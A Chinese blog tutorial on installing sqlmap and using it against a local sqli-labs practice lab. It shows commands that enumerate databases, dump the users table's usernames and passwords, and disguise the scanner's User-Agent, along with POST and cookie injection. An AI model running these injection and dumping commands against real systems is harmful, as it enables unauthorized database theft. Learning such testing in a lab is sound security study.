Sqlmap工具下载及使用

已于 2025-07-13 20:41:28 修改
阅读量804 收藏 16
点赞数 21
CC 4.0 BY-SA版权
文章标签: web安全 网络安全 sql 测试工具
于 2025-07-13 06:50:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81945070/article/details/148672601

文章目录

一、Sqlmap

sqlmap是一款开源的自动化SQL注入测试工具,主要用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库类型(如MySQL、Oracle、SQL Server等),能自动识别注入点,并通过多种技术手段获取数据库信息,包括表结构、数据内容,甚至能执行操作系统命令等。其操作相对简便,通过命令行参数配置目标URL、请求方式等信息,即可自动完成注入测试流程,广泛应用于网络安全渗透测试和漏洞评估场景。

二、下载

  • 官网:https://sqlmap.org/

  • github地址:https://github.com/sqlmapproject/sqlmap

  • 国内可下载地址:https://gitee.com/yijingsec/sqlmap

三、使用

  1. 进入sqlmap目录
    在这里插入图片描述
  2. 在路径输入cmd
    在这里插入图片描述
  3. 输入conda env list,查看环境。
    在这里插入图片描述
  4. 根据拥有的环境输入以下命令,出现如图所示界面,即配置成功。
    在这里插入图片描述

A.注入GET型

  1. url里只有一个参数(引号可不加)

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1”

在这里插入图片描述

  1. url里有两个参数(加引号)

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1&page=10” -p page

在这里插入图片描述

  1. 自动化测试:--batch

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch

在这里插入图片描述

  1. 获取库名:--dbs

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -dbs

在这里插入图片描述

  1. 获取表名:--tables,指定数据库:-D

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -tables -D security

在这里插入图片描述

  1. 获取列名:--columns,指定数据表:-T

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -columns -D security -T users

在这里插入图片描述

  1. 获取数据(拖库,实战中禁用慎用):--dump,指定列名:-C

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  1. GET型注入ua头会带有明显的Sqlmap标识

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -proxy=http://127.0.0.1:8080 -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  • 随机使用User-agent头:–random-agent

python sqlmap.py -u “http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1” -proxy=http://127.0.0.1:8080 -random-agent -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

  • 自定义使用ua头

python sqlmap.py -u http://127.0.0.1/sqli-labs/sqli-labs-master/Less-1/?id=1 --proxy=http://127.0.0.1:8080 --user-agent=“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0” -batch -D security -T users -C id,username,password -dump

在这里插入图片描述

B.注入POST型

  1. 打开第11关并打开代理,随意输入数字后点击提交。
    在这里插入图片描述

  2. 找到对应数据包,右击复制到文件并保存。
    在这里插入图片描述
    在这里插入图片描述

  3. 测试文件是否存在漏洞。
    在这里插入图片描述

C.注入head头

sqlmap默认测试所有的get和post参数,level值>2时也会测试cookie头的值,>=3时也会测试User-Agent和Referer头的值,最高可到5。

python sqlmap.py -u http://127.0.0.1/sqli-labs/sqli-labs-master/Less-20/in dex.php --cookie “uname=Dump” --level 2 --dbs

桑晒.
关注
Sqlmap下载和安装使用Windows
qq_43176656的博客
08-17 2931
sqlmap解题BUU SQL COURSE 1
SQLMAP数据库注入工具下载安装
syq8023的博客
12-16 3959
介绍 Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 种 SQL 注入技术(不加参数默认测试所有注入技术) 安装 注意: windows操作系统安装sqlmap需要安装python的运行环境。 下载地址:htt...
SQLmap下载和安装教程(详细附图)
weixin_44023403的博客
01-13 2万+
SQLmap下载和安装教程一、准备:1、下载安装python二、下载安装sqlmap 一、准备: python2.X(要是python2) SQLmap python下载地址:https://www.python.org/downloads/ SQLMap下载: http://sqlmap.org/ 1、下载安装python 根据自己电脑系统,选择下载版本,以64bit,Win10为例; 这里下载有点儿慢,可以复制下载链接,用迅雷下载; 双击安装; 将“Add python.exe to Path”
windows版SQLmap下载介绍
最新发布
gitblog_06719的博客
05-02 395
windows版SQLmap下载介绍 【下载地址】windows版SQLmap下载介绍 这是一款专为Windows用户打造的SQLmap绿色版工具,兼容Windows 10、7、8、XP等多种操作系统。无需繁琐安装,下载后解压即可直接使用,操作简单便捷。该版本经过严格配置,确保使用安全可靠。无论您是安全测试人员还是技术爱...
SQLMAP下载安装和使用(Windows)
weixin_68416970的博客
05-16 1万+
SQLMAP 是一款广泛使用的开源 SQL 注入检测和利用工具。本文介绍了SQLMAP下载安装和基本使用SQLMAP 这样的工具在合法的安全测试和研究环境之外的使用可能是非法的和不道德的。在实际应用中,应该在授权和合法的情况下使用它来帮助发现和修复系统中的安全漏洞,以提高系统的安全性。
windows下安装sqlmap
chengye4346的博客
07-19 464
准备工作: (1) Windows7/8/10操作系统; (2) Python3.7.0; (3) SQLMap 1、下载Python3.7.0 下载地址:https://www.python.org/downloads/ 安装python 安装完...
sqlmap下载安装
m0_46315342的博客
04-22 3137
sqlmap下载安装 sqlmap是需要python环境的,所以首先应该下载python,然后在下载sqlmap。 1.下载python2.7.16 python官网下载地址 在官网中下载由于时外网,所以页面刷新比较慢,可能还会出现下载不了的情况。建议使用谷歌游览器,把搜索引擎设置为Bing,使用国际版进行访问。如果还是不能下载,我是点击了很多次,试了很多次,不知道为什么莫名其妙的就可以了,建议...
SQLmap下载和安装,以及其参数大全和使用教程(值得收藏)
Gjqhs的博客
02-17 1万+
sqlmap官网 先把python 下载安装 ,再下载sqlmap 再把aqlmap扔到目录里解压 桌面建立cmd的快捷方式
sqlmap下载安装.md
04-22
自己在下载安装sqlmap的时候很麻烦,到处找资源,浪费了很多时间,有很多麻烦的操作,所以在自己安装成功之后,分享一下自己的安装经验,希望对别人有帮助。
直接下载sqlmap工具
02-21
直接下载sqlmap工具
sqlmap工具
06-30
sqlmap注入神器,这个百度一下就知道了,打ctf也经常使用
SQLMAP源文件下载
09-22
SQLMAP
sqlmapSQL注入工具
10-07
一个常用的SQL注入工具,用来实施SQL注入,蛮好用的。
sqlmap资源下载.txt
05-27
通过上传到burpsuite,可以在burp中集成使用sqlmap,非常实用的一款工具
【渗透工具sqlmap下载安装详细教程Windows/Linux(图文)
热门推荐
Z_David_Z的博客
01-27 2万+
目录==Windows安装Sqlmap:==1.Python2.7下载1.1 下载1.2 安装并配置环境变量2.sqlmap下载2.1 下载2.2 SQLMap安装2.3 建立快捷方式==Linux安装Sqlmap==1.下载sqlmap 源码进行安装2.解压运行3.进入安装目录,运行sqlmap脚本4.使用alias命令用来设置直接调用 Windows安装Sqlmap: 由于SQLMap是基于Python语言的,所以需要先安装Python语言环境 1.Python2.7下载 1.1 下载 地址:https
sqlmap win下载
wjwqp的专栏
03-01 235
sqlmap 官网下载 http://sqlmap.org/
下载使用sqlmap
weixin_50401030的博客
09-09 1085
首先要安装python然后配置好环境(这里我安装好了丢个截图偷下懒) 1| 点本机-高级属性-系统属性-环境变量 再去网页下载sqlmap 下载地址 1| 下载好后解压 2| 在桌面建立一个快捷方式 右键快捷方式属性 将原先那个解压的文件夹地址放到起始位置确定即可使用 使用sqlmap 登入个能注入的网站(这里用了SQLi-LABS Page-1(Basic Challenges)) sqlmap -u "http://localhost:
sqlmap工具下载csdn
07-10
3. 搜索结果页面会显示与SQLMap工具下载相关的文章、教程或资源。 4. 仔细查看搜索结果中的文章标题和描述,并寻找与SQLMap工具下载相关的资源。 5. 选择一个合适的文章或教程链接,点击进入详细页面。 6. 在详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值